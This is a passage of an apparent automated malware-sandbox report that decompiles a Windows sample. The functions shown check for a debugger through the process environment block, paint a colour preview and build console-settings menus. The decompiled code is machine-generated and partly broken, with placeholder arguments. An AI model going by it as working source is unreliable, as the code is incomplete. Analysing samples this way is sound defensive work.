                                                                                                                          • Opcode Fuzzy Hash: 3730ef5aa65c304e5d08ba1396b19783fc0a18d64667abfcf5b0030156945832
                                                                                                                          • Instruction Fuzzy Hash: D531AB71914248AFEB56CF68C546BAC7BF0FB01301F1844A1E4D4DB291D238DBA0EB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002525CB Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002525CB() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x2662dc = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                                          0x002525cb
                                                                                                                          0x002525d3
                                                                                                                          0x002525db

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 54951025-0
                                                                                                                          • Opcode ID: a3cc790bbd0774517e7d60ba0a01f6740305d01e4308af91ff96492ff6432c29
                                                                                                                          • Instruction ID: 8584ba8fb5eea16005fe3fb0b8e2abd21e1dff2f46ad401e019ee72eb7f419f3
                                                                                                                          • Opcode Fuzzy Hash: a3cc790bbd0774517e7d60ba0a01f6740305d01e4308af91ff96492ff6432c29
                                                                                                                          • Instruction Fuzzy Hash: 9CA001706062518F97508F36BA5D6093AA9AA86A91F19C06AE805C91A0EAA594A0AF81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002541CD Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002541CD(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00252369(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                                                                                          0x002541da
                                                                                                                          0x002541dc
                                                                                                                          0x002541df
                                                                                                                          0x002541e2
                                                                                                                          0x002541e5
                                                                                                                          0x002541f6
                                                                                                                          0x002541f8
                                                                                                                          0x002541e7
                                                                                                                          0x002541eb
                                                                                                                          0x002541f4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002541f4
                                                                                                                          0x002541fd

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
                                                                                                                          • Instruction ID: ae1eaa41b3af9ce26e2f8bd75976258f358642943ca31d5231d40d49c54cfd3f
                                                                                                                          • Opcode Fuzzy Hash: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
                                                                                                                          • Instruction Fuzzy Hash: 35E08C32921228FBCB14EB8CC94498AF3FCEB45B05B11869AB905D3100D270DE95CBE4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002500DE Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002500DE(void* __ecx, void* __eflags) {

				if(E002541CD(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                                                                                          0x002500e6
                                                                                                                          0x002500ff
                                                                                                                          0x002500fa
                                                                                                                          0x002500fc
                                                                                                                          0x002500fc

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
                                                                                                                          • Instruction ID: e495f513090cb7e547eb3a0d85e5d042cf2f69e8cb3f8fb7293afbc21b0fce11
                                                                                                                          • Opcode Fuzzy Hash: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
                                                                                                                          • Instruction Fuzzy Hash: FCC08C340A0E8047CE29AD18CAB23A43356A3A1BC7F80048DCC160BAC2C53F9CDBFA04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024BF70 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			E0024BF70(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}




























































                                                                                                                          0x0024bf86
                                                                                                                          0x0024bf89
                                                                                                                          0x0024bf92
                                                                                                                          0x0024bfc0
                                                                                                                          0x0024bfd6
                                                                                                                          0x0024bfe7
                                                                                                                          0x0024bfea
                                                                                                                          0x0024c007
                                                                                                                          0x0024c00d
                                                                                                                          0x0024c010
                                                                                                                          0x0024c013
                                                                                                                          0x0024c01a
                                                                                                                          0x0024c02c
                                                                                                                          0x0024c02f
                                                                                                                          0x0024c03d
                                                                                                                          0x0024c04b
                                                                                                                          0x0024c051
                                                                                                                          0x0024c05f
                                                                                                                          0x0024c06c
                                                                                                                          0x0024c079
                                                                                                                          0x0024c082
                                                                                                                          0x0024c092
                                                                                                                          0x0024c098
                                                                                                                          0x0024c09b
                                                                                                                          0x0024c0a7
                                                                                                                          0x0024c0aa
                                                                                                                          0x0024c0ae
                                                                                                                          0x0024c0b2
                                                                                                                          0x0024c0c1
                                                                                                                          0x0024c0da
                                                                                                                          0x0024c0e0
                                                                                                                          0x0024c0e6
                                                                                                                          0x0024c0ec
                                                                                                                          0x0024c10d
                                                                                                                          0x0024c113
                                                                                                                          0x0024c116
                                                                                                                          0x0024c11f
                                                                                                                          0x0024c128
                                                                                                                          0x0024c12b
                                                                                                                          0x0024c136
                                                                                                                          0x0024c139
                                                                                                                          0x0024c13d
                                                                                                                          0x0024c141
                                                                                                                          0x0024c149
                                                                                                                          0x0024c14f
                                                                                                                          0x0024c15b
                                                                                                                          0x0024c15e
                                                                                                                          0x0024c162
                                                                                                                          0x0024c166
                                                                                                                          0x0024c16c
                                                                                                                          0x0024c178
                                                                                                                          0x0024c17b
                                                                                                                          0x0024c17f
                                                                                                                          0x0024c183
                                                                                                                          0x0024c1a6
                                                                                                                          0x0024c1ac
                                                                                                                          0x0024c1b8
                                                                                                                          0x0024c1bb
                                                                                                                          0x0024c1bf
                                                                                                                          0x0024c1c3
                                                                                                                          0x0024c1c9
                                                                                                                          0x0024c1d5
                                                                                                                          0x0024c1d8
                                                                                                                          0x0024c1dc
                                                                                                                          0x0024c1e0
                                                                                                                          0x0024c1e6
                                                                                                                          0x0024c1ec
                                                                                                                          0x0024c1ef
                                                                                                                          0x0024c1f5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024c206
                                                                                                                          0x0024c20f
                                                                                                                          0x0024c218
                                                                                                                          0x0024c221
                                                                                                                          0x0024c22b
                                                                                                                          0x0024c231
                                                                                                                          0x0024c237
                                                                                                                          0x0024c23a
                                                                                                                          0x0024c23e
                                                                                                                          0x0024c244
                                                                                                                          0x0024c244
                                                                                                                          0x0024c259
                                                                                                                          0x0024c25f
                                                                                                                          0x0024c25f
                                                                                                                          0x0024c26d
                                                                                                                          0x0024c26d
                                                                                                                          0x0024c282
                                                                                                                          0x00000000
                                                                                                                          0x0024bf98
                                                                                                                          0x0024bfa8
                                                                                                                          0x0024c2a0
                                                                                                                          0x0024c2b4
                                                                                                                          0x0024c2b7
                                                                                                                          0x0024c2cb
                                                                                                                          0x0024c2dc
                                                                                                                          0x0024c2f0
                                                                                                                          0x0024c2f3
                                                                                                                          0x0024c304
                                                                                                                          0x0024c311
                                                                                                                          0x0024c331
                                                                                                                          0x0024c372
                                                                                                                          0x0024c393
                                                                                                                          0x0024c3cd
                                                                                                                          0x0024c3cd
                                                                                                                          0x0024bfae
                                                                                                                          0x0024c3c5
                                                                                                                          0x0024c3c5
                                                                                                                          0x0024bfa8
                                                                                                                          0x0024c3df

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 88183673-0
                                                                                                                          • Opcode ID: 33b98cedd18625d55f0649404a87bd11025d118e538bc61b4d39dc6ded27fc14
                                                                                                                          • Instruction ID: 96be93f300e74fab8f29c1a4179cb04e4ac79cae997c6c1ea903e09a1e4d21b0
                                                                                                                          • Opcode Fuzzy Hash: 33b98cedd18625d55f0649404a87bd11025d118e538bc61b4d39dc6ded27fc14
                                                                                                                          • Instruction Fuzzy Hash: CED180B59043089FCB54EFA8E58969DBBF1BF48300F10892DE899EB350DB74A954CF46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024AE70 Relevance: 31.7, APIs: 21, Instructions: 226windowCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 49%
                                                                                                                          			E0024AE70(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0xffe40000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0xffe40000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0xffe40000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0xffe40000();
						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0xffe40000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0xffe40000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0xffe40000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0xffe40000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0xffe40000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}


































                                                                                                                          0x0024ae88
                                                                                                                          0x0024ae8e
                                                                                                                          0x0024ae91
                                                                                                                          0x0024ae98
                                                                                                                          0x0024aeb0
                                                                                                                          0x0024aeb7
                                                                                                                          0x0024aec9
                                                                                                                          0x0024aecf
                                                                                                                          0x0024aed2
                                                                                                                          0x0024aef6
                                                                                                                          0x0024af27
                                                                                                                          0x0024af30
                                                                                                                          0x0024af36
                                                                                                                          0x0024af39
                                                                                                                          0x0024af5d
                                                                                                                          0x0024af8e
                                                                                                                          0x0024af97
                                                                                                                          0x0024af9d
                                                                                                                          0x0024afa0
                                                                                                                          0x0024afc4
                                                                                                                          0x0024aff5
                                                                                                                          0x0024affe
                                                                                                                          0x0024b004
                                                                                                                          0x0024b007
                                                                                                                          0x0024b02b
                                                                                                                          0x0024b05c
                                                                                                                          0x0024b065
                                                                                                                          0x0024b06b
                                                                                                                          0x0024b06e
                                                                                                                          0x0024b092
                                                                                                                          0x0024b0c3
                                                                                                                          0x0024b0cc
                                                                                                                          0x0024b0d2
                                                                                                                          0x0024b0d5
                                                                                                                          0x0024b0f9
                                                                                                                          0x0024b12a
                                                                                                                          0x0024b130
                                                                                                                          0x0024b137
                                                                                                                          0x0024b165
                                                                                                                          0x0024b16b
                                                                                                                          0x0024b16b
                                                                                                                          0x0024b16e
                                                                                                                          0x0024b174
                                                                                                                          0x0024b177
                                                                                                                          0x0024b19b
                                                                                                                          0x0024b1cb
                                                                                                                          0x0024b1d4
                                                                                                                          0x0024b1da
                                                                                                                          0x0024b1dd
                                                                                                                          0x0024b201
                                                                                                                          0x0024b232
                                                                                                                          0x0024b23b
                                                                                                                          0x0024b241
                                                                                                                          0x0024b244
                                                                                                                          0x0024b249
                                                                                                                          0x0024b255
                                                                                                                          0x0024b258
                                                                                                                          0x0024b260
                                                                                                                          0x0024b264
                                                                                                                          0x0024b268
                                                                                                                          0x0024b26e
                                                                                                                          0x0024b27a
                                                                                                                          0x0024b27d
                                                                                                                          0x0024b285
                                                                                                                          0x0024b28d
                                                                                                                          0x0024b295
                                                                                                                          0x0024b299
                                                                                                                          0x0024b29f
                                                                                                                          0x0024b2a2
                                                                                                                          0x0024aebd
                                                                                                                          0x0024aebd
                                                                                                                          0x0024aebd
                                                                                                                          0x0024ae9e
                                                                                                                          0x0024ae9e
                                                                                                                          0x0024ae9e
                                                                                                                          0x0024b2b3

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHandleMenuModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4123625242-0
                                                                                                                          • Opcode ID: e76df6756d4748bcb1291e4abd6e906f60f1ca3dd51fb45fef0e80fc1b0e3ef3
                                                                                                                          • Instruction ID: 98ea59470dc7239e20186ac7f65c812b4b31f06146f9d7dc51953cd6e83ceb82
                                                                                                                          • Opcode Fuzzy Hash: e76df6756d4748bcb1291e4abd6e906f60f1ca3dd51fb45fef0e80fc1b0e3ef3
                                                                                                                          • Instruction Fuzzy Hash: C6C1B5B48083059FD714EF68D58869EBBF0EB84324F10CB6DE8A997394D7749698CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024BD12 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
                                                                                                                          • String ID: ASCII: abcXYZ
                                                                                                                          • API String ID: 3404974346-732927841
                                                                                                                          • Opcode ID: 5756274c8393875f31a55e5b3254617e531221fe8301623069976c5a1e71da0d
                                                                                                                          • Instruction ID: 0e9b43773ccbcd97f4ea3fc2d8d53b7a2bbeab2d192e87f56fe3ab572ff71378
                                                                                                                          • Opcode Fuzzy Hash: 5756274c8393875f31a55e5b3254617e531221fe8301623069976c5a1e71da0d
                                                                                                                          • Instruction Fuzzy Hash: 5C6194B19083058FCB04EFA8E58865EBFF0BF48315F11892DE89997354E7749998DF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024A6C0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 29%
                                                                                                                          			E0024A6C0(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L0025B10A();
				E0024FC70(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E002433B0(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E0024B9A0();
					_t156 = _t155 - 8;
				}
				E0024F6F0( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E0024BBF0;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E0024BF70;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0xffe40000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E00251237();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E0024E06E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E00244AF0();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E00248EB0();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
